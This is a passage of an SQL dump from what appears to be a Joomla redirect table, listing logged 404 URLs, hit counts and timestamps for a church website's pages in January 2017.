(2810, 'http://lifeoasisinternationalchurch.org/resources/bl', NULL, '', '', 7, 0, '2017-01-24 18:15:05', '0000-00-00 00:00:00', 301),
(2811, 'http://lifeoasisinternationalchurch.org/resources/b', NULL, '', '', 7, 0, '2017-01-24 18:15:05', '0000-00-00 00:00:00', 301),
(2812, 'http://lifeoasisinternationalchurch.org/resources', NULL, '', '', 23, 0, '2017-01-24 18:15:06', '0000-00-00 00:00:00', 301),
(2813, 'http://lifeoasisinternationalchurch.org/re', NULL, '', '', 7, 0, '2017-01-24 18:15:06', '0000-00-00 00:00:00', 301),
(2814, 'http://lifeoasisinternationalchurch.org/reso', NULL, '', '', 8, 0, '2017-01-24 18:15:06', '0000-00-00 00:00:00', 301),
(2815, 'http://lifeoasisinternationalchurch.org/resourc', NULL, '', '', 10, 0, '2017-01-24 18:15:06', '0000-00-00 00:00:00', 301),
(2816, 'http://lifeoasisinternationalchurch.org/res', NULL, '', '', 9, 0, '2017-01-24 18:15:06', '0000-00-00 00:00:00', 301),
(2817, 'http://lifeoasisinternationalchurch.org/resour', NULL, '', '', 10, 0, '2017-01-24 18:15:07', '0000-00-00 00:00:00', 301),
(2818, 'http://lifeoasisinternationalchurch.org/r', NULL, '', '', 7, 0, '2017-01-24 18:15:07', '0000-00-00 00:00:00', 301),
(2819, 'http://lifeoasisinternationalchurch.org/resource', NULL, '', '', 10, 0, '2017-01-24 18:15:08', '0000-00-00 00:00:00', 301),
(2820, 'http://www.lifeoasisinternationalchurch.org/2012-11-09-09-57-10/father-s-heart', NULL, '', '', 2, 0, '2017-01-24 18:41:05', '0000-00-00 00:00:00', 301),
(2821, 'http://www.lifeoasisinternationalchurch.org/63-day-11', NULL, '', '', 6, 0, '2017-01-24 18:52:02', '0000-00-00 00:00:00', 301),
(2822, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/2', NULL, '', '', 1, 0, '2017-01-24 20:13:52', '0000-00-00 00:00:00', 301),
(2823, 'http://ljmti.lifeoasisinternationalchurch.org/brief-history', NULL, '', '', 2, 0, '2017-01-24 20:49:28', '0000-00-00 00:00:00', 301),
(2824, 'http://www.lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/11/14/-', NULL, '', '', 1, 0, '2017-01-24 23:44:01', '0000-00-00 00:00:00', 301),
(2825, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/12/-', NULL, '', '', 1, 0, '2017-01-25 02:27:58', '0000-00-00 00:00:00', 301),
(2826, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/8/-', NULL, '', '', 1, 0, '2017-01-25 02:28:07', '0000-00-00 00:00:00', 301),
(2827, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/21/-', NULL, '', '', 1, 0, '2017-01-25 02:28:40', '0000-00-00 00:00:00', 301),
(2828, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/28/-', NULL, '', '', 1, 0, '2017-01-25 02:28:56', '0000-00-00 00:00:00', 301),
(2829, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/17/-', NULL, '', '', 1, 0, '2017-01-25 02:29:13', '0000-00-00 00:00:00', 301),
(2830, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/11/-', NULL, '', '', 1, 0, '2017-01-25 02:29:29', '0000-00-00 00:00:00', 301),
(2831, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/11/-', NULL, '', '', 1, 0, '2017-01-25 02:29:45', '0000-00-00 00:00:00', 301),
(2832, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/11/-', NULL, '', '', 1, 0, '2017-01-25 02:30:01', '0000-00-00 00:00:00', 301),
(2833, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/10/-', NULL, '', '', 1, 0, '2017-01-25 02:30:17', '0000-00-00 00:00:00', 301),
(2834, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/12/-', NULL, '', '', 1, 0, '2017-01-25 02:30:33', '0000-00-00 00:00:00', 301),
(2835, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/12/-', NULL, '', '', 1, 0, '2017-01-25 02:30:50', '0000-00-00 00:00:00', 301),
(2836, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/4/-', NULL, '', '', 1, 0, '2017-01-25 02:31:06', '0000-00-00 00:00:00', 301),
(2837, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/24/-', NULL, '', '', 1, 0, '2017-01-25 02:31:22', '0000-00-00 00:00:00', 301),
(2838, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/10/-', NULL, '', '', 1, 0, '2017-01-25 02:31:39', '0000-00-00 00:00:00', 301),
(2839, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/8/-', NULL, '', '', 1, 0, '2017-01-25 02:31:55', '0000-00-00 00:00:00', 301),
(2840, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/25/-', NULL, '', '', 1, 0, '2017-01-25 02:32:08', '0000-00-00 00:00:00', 301),
(2841, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/26/-', NULL, '', '', 1, 0, '2017-01-25 02:32:20', '0000-00-00 00:00:00', 301),
(2842, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/26/-', NULL, '', '', 1, 0, '2017-01-25 02:32:35', '0000-00-00 00:00:00', 301),
(2843, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/14-entering-into-winning-position-2', NULL, '', '', 3, 0, '2017-01-25 03:02:51', '0000-00-00 00:00:00', 301),
(2844, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/25', NULL, '', '', 3, 0, '2017-01-25 03:26:05', '0000-00-00 00:00:00', 301),
(2845, 'http://lifeoasisinternationalchurch.org/asom', NULL, 'http://dc.lifeoasisinternationalchurch.org/', '', 2, 0, '2017-01-25 06:17:56', '0000-00-00 00:00:00', 301),
(2846, 'http://lifeoasisinternationalchurch.org/event/index.php', NULL, 'http://lifeoasisinternationalchurch.org/index.php', '', 1, 0, '2017-01-25 06:17:57', '0000-00-00 00:00:00', 301),
(2847, 'http://ljmti.lifeoasisinternationalchurch.org/ministries/dod', NULL, '', '', 1, 0, '2017-01-25 07:28:29', '0000-00-00 00:00:00', 301),
(2848, 'https://mail.anointeddaughtersofdestiny.org//postfixadmin/login.php', NULL, '', '', 1, 0, '2017-01-25 09:50:03', '0000-00-00 00:00:00', 301),
(2849, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/24/-', NULL, '', '', 1, 0, '2017-01-25 11:33:14', '0000-00-00 00:00:00', 301),
(2850, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/24/-', NULL, '', '', 1, 0, '2017-01-25 11:33:16', '0000-00-00 00:00:00', 301),
(2851, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/17/-', NULL, '', '', 1, 0, '2017-01-25 11:33:32', '0000-00-00 00:00:00', 301),
(2852, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/2/-', NULL, '', '', 1, 0, '2017-01-25 11:33:49', '0000-00-00 00:00:00', 301),
(2853, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/9/-', NULL, '', '', 1, 0, '2017-01-25 11:34:09', '0000-00-00 00:00:00', 301),
(2854, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/14/-', NULL, '', '', 1, 0, '2017-01-25 11:34:22', '0000-00-00 00:00:00', 301),
(2855, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/24/-', NULL, '', '', 1, 0, '2017-01-25 11:34:53', '0000-00-00 00:00:00', 301),
(2856, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/21/-', NULL, '', '', 1, 0, '2017-01-25 11:35:23', '0000-00-00 00:00:00', 301),
(2857, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/20/-', NULL, '', '', 1, 0, '2017-01-25 11:35:42', '0000-00-00 00:00:00', 301),
(2858, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/24/-', NULL, '', '', 1, 0, '2017-01-25 11:35:54', '0000-00-00 00:00:00', 301),
(2859, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/11/-', NULL, '', '', 1, 0, '2017-01-25 11:36:11', '0000-00-00 00:00:00', 301),
(2860, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/30/-', NULL, '', '', 1, 0, '2017-01-25 11:36:27', '0000-00-00 00:00:00', 301),
(2861, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/13/-', NULL, '', '', 1, 0, '2017-01-25 11:36:40', '0000-00-00 00:00:00', 301),
(2862, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/25/-', NULL, '', '', 1, 0, '2017-01-25 11:36:57', '0000-00-00 00:00:00', 301),
(2863, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/1/-', NULL, '', '', 1, 0, '2017-01-25 11:37:10', '0000-00-00 00:00:00', 301),
(2864, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/10/-', NULL, '', '', 1, 0, '2017-01-25 11:43:46', '0000-00-00 00:00:00', 301),
(2865, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/19/-', NULL, '', '', 1, 0, '2017-01-25 11:47:31', '0000-00-00 00:00:00', 301),
(2866, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/14/-', NULL, '', '', 1, 0, '2017-01-25 11:51:45', '0000-00-00 00:00:00', 301),
(2867, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/31/-', NULL, '', '', 1, 0, '2017-01-25 11:55:13', '0000-00-00 00:00:00', 301),
(2868, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/6/-', NULL, '', '', 1, 0, '2017-01-25 11:58:49', '0000-00-00 00:00:00', 301),
(2869, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/10/-', NULL, '', '', 1, 0, '2017-01-25 12:02:37', '0000-00-00 00:00:00', 301),
(2870, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/27/-', NULL, '', '', 1, 0, '2017-01-25 12:06:26', '0000-00-00 00:00:00', 301),
(2871, 'http://www.lifeoasisinternationalchurch.org/web', NULL, 'http://www.lifeoasisinternationalchurch.org/web', '', 11, 0, '2017-01-25 13:13:43', '0000-00-00 00:00:00', 301),
(2872, 'http://www.lifeoasisinternationalchurch.org/web/xmlrpc.php', NULL, 'http://www.lifeoasisinternationalchurch.org/web/xmlrpc.php', '', 18, 0, '2017-01-25 13:13:43', '0000-00-00 00:00:00', 301),
(2873, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=WordPress&Itemid=625', NULL, '', '', 1, 0, '2017-01-25 14:02:43', '0000-00-00 00:00:00', 301),
(2874, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=HTML5&Itemid=770', NULL, '', '', 1, 0, '2017-01-25 15:18:36', '0000-00-00 00:00:00', 301),
(2875, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermons/0/0?limitstart=0', NULL, '', '', 2, 0, '2017-01-25 16:21:30', '0000-00-00 00:00:00', 301),
(2876, 'http://lifeoasisinternationalchurch.org/prayer/139-2014-10', NULL, '', '', 1, 0, '2017-01-25 17:11:10', '0000-00-00 00:00:00', 301),
(2877, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=item&layout=item&id=2&Itemid=623', NULL, '', '', 1, 0, '2017-01-25 17:50:24', '0000-00-00 00:00:00', 301),
(2878, 'http://lifeoasisinternationalchurch.org/2011-08-10-21-22-58/10-about-us', NULL, '', '', 1, 0, '2017-01-25 17:59:00', '0000-00-00 00:00:00', 301),
(2879, 'http://lifeoasisinternationalchurch.org/2-uncategorised/60-destinytv', NULL, '', '', 3, 0, '2017-01-25 18:01:20', '0000-00-00 00:00:00', 301),
(2880, 'http://lifeoasisinternationalchurch.org/19-prayer-a-fasting-day-10', NULL, '', '', 7, 0, '2017-01-25 18:01:21', '0000-00-00 00:00:00', 301),
(2881, 'http://lifeoasisinternationalchurch.org/144-2014-15', NULL, '', '', 2, 0, '2017-01-25 18:01:21', '0000-00-00 00:00:00', 301),
(2882, 'http://lifeoasisinternationalchurch.org/12-sample-content/19-sample-content-8', NULL, '', '', 2, 0, '2017-01-25 18:01:25', '0000-00-00 00:00:00', 301),
(2883, 'http://lifeoasisinternationalchurch.org/79-day-27', NULL, '', '', 1, 0, '2017-01-25 18:01:28', '0000-00-00 00:00:00', 301),
(2884, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/50-prayer-a-fasting-day-40', NULL, '', '', 3, 0, '2017-01-25 18:01:29', '0000-00-00 00:00:00', 301),
(2885, 'http://lifeoasisinternationalchurch.org/7-kindom-builder/19-prayer-a-fasting-day-10', NULL, '', '', 4, 0, '2017-01-25 18:01:30', '0000-00-00 00:00:00', 301),
(2886, 'http://lifeoasisinternationalchurch.org/2011-08-10-21-22-58/16-divine-instructions', NULL, '', '', 3, 0, '2017-01-25 18:01:31', '0000-00-00 00:00:00', 301),
(2887, 'http://lifeoasisinternationalchurch.org/150-focus29', NULL, '', '', 2, 0, '2017-01-25 18:01:32', '0000-00-00 00:00:00', 301),
(2888, 'http://lifeoasisinternationalchurch.org/154-focus32', NULL, '', '', 2, 0, '2017-01-25 18:01:33', '0000-00-00 00:00:00', 301),
(2889, 'http://lifeoasisinternationalchurch.org/36-prayer-a-fasting-day-27', NULL, '', '', 10, 0, '2017-01-25 18:01:33', '0000-00-00 00:00:00', 301),
(2890, 'http://lifeoasisinternationalchurch.org/16-prayer-a-fasting-day-7', NULL, '', '', 1, 0, '2017-01-25 18:01:33', '0000-00-00 00:00:00', 301),
(2891, 'http://lifeoasisinternationalchurch.org/164-prayerfocus23', NULL, '', '', 2, 0, '2017-01-25 18:22:03', '0000-00-00 00:00:00', 301),
(2892, 'http://lifeoasisinternationalchurch.org/12-sample-content/15-sample-content-4', NULL, '', '', 4, 0, '2017-01-25 18:29:25', '0000-00-00 00:00:00', 301),
(2893, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/16-entering-into-winning-position-4', NULL, '', '', 2, 0, '2017-01-25 18:29:26', '0000-00-00 00:00:00', 301),
(2894, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/20', NULL, '', '', 4, 0, '2017-01-25 18:29:27', '0000-00-00 00:00:00', 301),
(2895, 'http://lifeoasisinternationalchurch.org/14-prayer-a-fasting-day-5', NULL, '', '', 2, 0, '2017-01-25 18:29:28', '0000-00-00 00:00:00', 301),
(2896, 'http://lifeoasisinternationalchurch.org/141-2014-12', NULL, '', '', 2, 0, '2017-01-25 18:29:28', '0000-00-00 00:00:00', 301),
(2897, 'http://lifeoasisinternationalchurch.org/163-focus21', NULL, '', '', 2, 0, '2017-01-25 18:38:47', '0000-00-00 00:00:00', 301),
(2898, 'http://lifeoasisinternationalchurch.org/30-prophetic-words-for-day-21', NULL, '', '', 2, 0, '2017-01-25 18:50:26', '0000-00-00 00:00:00', 301),
(2899, 'http://lifeoasisinternationalchurch.org/12-prayer-a-fasting-day-3', NULL, '', '', 2, 0, '2017-01-25 18:50:27', '0000-00-00 00:00:00', 301),
(2900, 'http://lifeoasisinternationalchurch.org/125-prayer-focus-for-day-36', NULL, '', '', 2, 0, '2017-01-25 19:02:20', '0000-00-00 00:00:00', 301),
(2901, 'http://lifeoasisinternationalchurch.org/147-day222014-2', NULL, '', '', 2, 0, '2017-01-25 19:02:25', '0000-00-00 00:00:00', 301),
(2902, 'http://lifeoasisinternationalchurch.org/152-prayerfocus31', NULL, '', '', 2, 0, '2017-01-25 19:02:25', '0000-00-00 00:00:00', 301),
(2903, 'http://lifeoasisinternationalchurch.org/17-prayer-a-fasting-day-8', NULL, '', '', 4, 0, '2017-01-25 19:02:26', '0000-00-00 00:00:00', 301),
(2904, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/25/-', NULL, '', '', 1, 0, '2017-01-25 19:48:33', '0000-00-00 00:00:00', 301),
(2905, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/7/-', NULL, '', '', 1, 0, '2017-01-25 19:48:44', '0000-00-00 00:00:00', 301),
(2906, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/13/-', NULL, '', '', 1, 0, '2017-01-25 19:49:03', '0000-00-00 00:00:00', 301),
(2907, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/4/-', NULL, '', '', 1, 0, '2017-01-25 19:49:21', '0000-00-00 00:00:00', 301),
(2908, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/27/-', NULL, '', '', 1, 0, '2017-01-25 19:49:39', '0000-00-00 00:00:00', 301),
(2909, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/6/-', NULL, '', '', 1, 0, '2017-01-25 19:50:00', '0000-00-00 00:00:00', 301),
(2910, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/19/-', NULL, '', '', 1, 0, '2017-01-25 19:50:15', '0000-00-00 00:00:00', 301),
(2911, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/29/-', NULL, '', '', 1, 0, '2017-01-25 19:50:33', '0000-00-00 00:00:00', 301),
(2912, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/5/-', NULL, '', '', 1, 0, '2017-01-25 19:50:51', '0000-00-00 00:00:00', 301),
(2913, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/12/-', NULL, '', '', 1, 0, '2017-01-25 19:51:09', '0000-00-00 00:00:00', 301),
(2914, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/24/-', NULL, '', '', 1, 0, '2017-01-25 19:51:30', '0000-00-00 00:00:00', 301),
(2915, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/16/-', NULL, '', '', 1, 0, '2017-01-25 19:51:45', '0000-00-00 00:00:00', 301),
(2916, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/31/-', NULL, '', '', 1, 0, '2017-01-25 19:52:05', '0000-00-00 00:00:00', 301),
(2917, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/5/-', NULL, '', '', 1, 0, '2017-01-25 19:52:24', '0000-00-00 00:00:00', 301),
(2918, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/26/-', NULL, '', '', 1, 0, '2017-01-25 19:52:46', '0000-00-00 00:00:00', 301),
(2919, 'http://lifeoasisinternationalchurch.org/133-2014-4', NULL, '', '', 2, 0, '2017-01-25 22:25:23', '0000-00-00 00:00:00', 301),
(2920, 'http://lifeoasisinternationalchurch.org/145-2014-16', NULL, '', '', 2, 0, '2017-01-25 22:25:24', '0000-00-00 00:00:00', 301),
(2921, 'http://lifeoasisinternationalchurch.org/56-day2', NULL, '', '', 2, 0, '2017-01-25 22:25:24', '0000-00-00 00:00:00', 301),
(2922, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/16', NULL, '', '', 4, 0, '2017-01-25 23:06:36', '0000-00-00 00:00:00', 301),
(2923, 'http://ljmti.lifeoasisinternationalchurch.org/home/lifeoasi/public_html/ljmti/images/effective3.png', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-25 23:22:54', '0000-00-00 00:00:00', 301),
(2924, 'http://ljmti.lifeoasisinternationalchurch.org/images/effective2.jpg', NULL, 'http://ljmti.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-25 23:22:54', '0000-00-00 00:00:00', 301),
(2925, 'http://lifeoasisinternationalchurch.org/146-day222014', NULL, '', '', 2, 0, '2017-01-25 23:28:36', '0000-00-00 00:00:00', 301),
(2926, 'http://lifeoasisinternationalchurch.org/15-prayer-a-fasting-day-6', NULL, '', '', 2, 0, '2017-01-25 23:28:37', '0000-00-00 00:00:00', 301),
(2927, 'http://lifeoasisinternationalchurch.org/151-prayerfocus30', NULL, '', '', 2, 0, '2017-01-25 23:28:38', '0000-00-00 00:00:00', 301),
(2928, 'http://lifeoasisinternationalchurch.org/34-prayer-a-fasting-day-25', NULL, '', '', 4, 0, '2017-01-25 23:28:40', '0000-00-00 00:00:00', 301),
(2929, 'http://www.lifeoasisinternationalchurch.org/prayer/160-focus38', NULL, '', '', 1, 0, '2017-01-25 23:35:44', '0000-00-00 00:00:00', 301),
(2930, 'http://lifeoasisinternationalchurch.org/template-info/gin/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-26 01:34:54', '0000-00-00 00:00:00', 301),
(2931, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/6', NULL, '', '', 2, 0, '2017-01-26 01:56:19', '0000-00-00 00:00:00', 301),
(2932, 'https://www.spiritmeat.net/component/content/article/12-sample-content/18-sample-content-7?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-01-26 04:52:54', '0000-00-00 00:00:00', 301),
(2933, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog', NULL, '', '', 2, 0, '2017-01-26 04:54:10', '0000-00-00 00:00:00', 301),
(2934, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/28/15', NULL, '', '', 1, 0, '2017-01-26 05:33:22', '0000-00-00 00:00:00', 301),
(2935, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/21/-', NULL, '', '', 1, 0, '2017-01-26 07:18:16', '0000-00-00 00:00:00', 301),
(2936, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/20/-', NULL, '', '', 1, 0, '2017-01-26 07:18:33', '0000-00-00 00:00:00', 301),
(2937, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/29/-', NULL, '', '', 1, 0, '2017-01-26 07:18:49', '0000-00-00 00:00:00', 301),
(2938, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/6/-', NULL, '', '', 1, 0, '2017-01-26 07:19:06', '0000-00-00 00:00:00', 301),
(2939, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/4/-', NULL, '', '', 1, 0, '2017-01-26 07:19:23', '0000-00-00 00:00:00', 301),
(2940, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/28/-', NULL, '', '', 1, 0, '2017-01-26 07:19:40', '0000-00-00 00:00:00', 301),
(2941, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/28/-', NULL, '', '', 1, 0, '2017-01-26 07:19:54', '0000-00-00 00:00:00', 301),
(2942, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/30/-', NULL, '', '', 1, 0, '2017-01-26 07:20:11', '0000-00-00 00:00:00', 301),
(2943, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/25/-', NULL, '', '', 1, 0, '2017-01-26 07:20:26', '0000-00-00 00:00:00', 301),
(2944, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/27/-', NULL, '', '', 1, 0, '2017-01-26 07:20:57', '0000-00-00 00:00:00', 301),
(2945, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/31/-', NULL, '', '', 1, 0, '2017-01-26 07:21:15', '0000-00-00 00:00:00', 301),
(2946, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/1/-', NULL, '', '', 1, 0, '2017-01-26 07:21:28', '0000-00-00 00:00:00', 301),
(2947, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/18/-', NULL, '', '', 1, 0, '2017-01-26 07:21:44', '0000-00-00 00:00:00', 301),
(2948, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/23/-', NULL, '', '', 1, 0, '2017-01-26 07:22:00', '0000-00-00 00:00:00', 301),
(2949, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/25/-', NULL, '', '', 1, 0, '2017-01-26 07:22:16', '0000-00-00 00:00:00', 301),
(2950, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/30/-', NULL, '', '', 1, 0, '2017-01-26 07:22:32', '0000-00-00 00:00:00', 301),
(2951, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/4/-', NULL, '', '', 1, 0, '2017-01-26 07:22:51', '0000-00-00 00:00:00', 301),
(2952, 'http://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/10-preset-styles', NULL, '', '', 3, 0, '2017-01-26 08:10:58', '0000-00-00 00:00:00', 301),
(2953, 'http://www.lifeoasisinternationalchurch.org/template-info/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 1, 0, '2017-01-26 08:41:10', '0000-00-00 00:00:00', 301),
(2954, 'http://www.lifeoasisinternationalchurch.org/component/tags/tag/', NULL, '', '', 1, 0, '2017-01-26 09:23:29', '0000-00-00 00:00:00', 301),
(2955, 'http://www.lifeoasisinternationalchurch.org/index.php/240-2016-day-23', NULL, '', '', 11, 0, '2017-01-26 11:43:05', '0000-00-00 00:00:00', 301),
(2956, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/17-entering-into-winning-position-5', NULL, '', '', 6, 0, '2017-01-26 11:53:45', '0000-00-00 00:00:00', 301),
(2957, 'http://www.lifeoasisinternationalchurch.org/ministries/books/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-01-26 11:53:47', '0000-00-00 00:00:00', 301),
(2958, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=arrowthemes&Itemid=770', NULL, '', '', 1, 0, '2017-01-26 12:47:10', '0000-00-00 00:00:00', 301),
(2959, 'http://www.lifeoasisinternationalchurch.org/149-day222014-4', NULL, '', '', 1, 0, '2017-01-26 12:50:11', '0000-00-00 00:00:00', 301),
(2960, 'http://www.lifeoasisinternationalchurch.org/template-info/11-demo-articles/54-slide-04', NULL, '', '', 1, 0, '2017-01-26 13:10:56', '0000-00-00 00:00:00', 301),
(2961, 'http://www.lifeoasisinternationalchurch.org/template-info', NULL, '', '', 2, 0, '2017-01-26 13:20:02', '0000-00-00 00:00:00', 301),
(2962, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/53-prayer-a-fasting-day-40', NULL, '', '', 4, 0, '2017-01-26 14:47:59', '0000-00-00 00:00:00', 301),
(2963, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=responsive&Itemid=770', NULL, '', '', 1, 0, '2017-01-26 16:34:09', '0000-00-00 00:00:00', 301),
(2964, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/22/-', NULL, '', '', 1, 0, '2017-01-26 17:02:59', '0000-00-00 00:00:00', 301),
(2965, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/10/-', NULL, '', '', 1, 0, '2017-01-26 17:04:55', '0000-00-00 00:00:00', 301),
(2966, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/23/-', NULL, '', '', 1, 0, '2017-01-26 17:08:42', '0000-00-00 00:00:00', 301),
(2967, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/13/-', NULL, '', '', 1, 0, '2017-01-26 17:12:31', '0000-00-00 00:00:00', 301),
(2968, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/15/-', NULL, '', '', 1, 0, '2017-01-26 17:16:17', '0000-00-00 00:00:00', 301),
(2969, 'http://www.lifeoasisinternationalchurch.org/finance/hotel-reservation/download', NULL, '', '', 2, 0, '2017-01-26 17:18:55', '0000-00-00 00:00:00', 301),
(2970, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/23/-', NULL, '', '', 1, 0, '2017-01-26 17:20:04', '0000-00-00 00:00:00', 301),
(2971, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/9/-', NULL, '', '', 1, 0, '2017-01-26 17:23:53', '0000-00-00 00:00:00', 301),
(2972, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/25/-', NULL, '', '', 1, 0, '2017-01-26 17:27:39', '0000-00-00 00:00:00', 301),
(2973, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/2/-', NULL, '', '', 1, 0, '2017-01-26 17:31:26', '0000-00-00 00:00:00', 301),
